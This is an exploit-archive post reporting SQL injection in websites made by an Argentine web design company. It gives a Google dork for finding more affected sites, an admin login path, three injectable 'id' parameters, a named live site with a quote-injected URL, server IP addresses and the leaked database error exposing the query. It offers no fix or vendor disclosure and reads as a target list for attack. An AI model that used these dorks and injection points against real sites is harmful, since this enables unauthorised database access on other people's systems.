facebook facebook twitter rss

Grupo LosGrobo Web Design Argentina SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019

# Exploit Title : Grupo LosGrobo Web Design Argentina SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 10/01/2019
# Vendor Homepage : losgrobo.com ~ grupolosgrobo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Grupo LosGrobo'' site:ar
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-grupo-losgrobo-web-design-argentina-sql-injection.html

################################################################

# Admin Panel Login Path :

/reportesUPJ/index.aspx

# SQL Injection Exploit :

/novedades.php?id=[SQL Injection]

/mercado.php?id=[SQL Injection]

/rse_notas.php?id=[SQL Injection]

################################################################

# Example Vulnerable Site =>

Note : (192.185.3.54) => There are 106 domains hosted on this server.

Note : (192.185.30.132) => There are 63 domains hosted on this server.

[+] upj.com.ar/novedades.php?id=719%27 =>

[ Proof of Concept ] => archive.fo/2kEkb

################################################################

# SQL Database Error :

Warning: session_start() [function.session-start]: Cannot send session cookie -
headers already sent by (output started at /home/upjcom/public_html/novedades.php:5)
in /home/upjcom/public_html/novedades_include.php on line 2

Warning: session_start() [function.session-start]: Cannot send session cache limiter -
headers already sent (output started at /home/upjcom/public_html/novedades.php:5) in
/home/upjcom/public_html/novedades_include.php on line 2

Consulta no vlida: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'' and state=1 order by created desc LIMIT 0,5' at line 1
Consulta completa: SELECT id, date_format(created,) AS fecha ,
title, `introtext`, alias FROM jos_content where catid=47 and id=719' and state=1
order by created desc LIMIT 0,5

################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################

Like us on Facebook :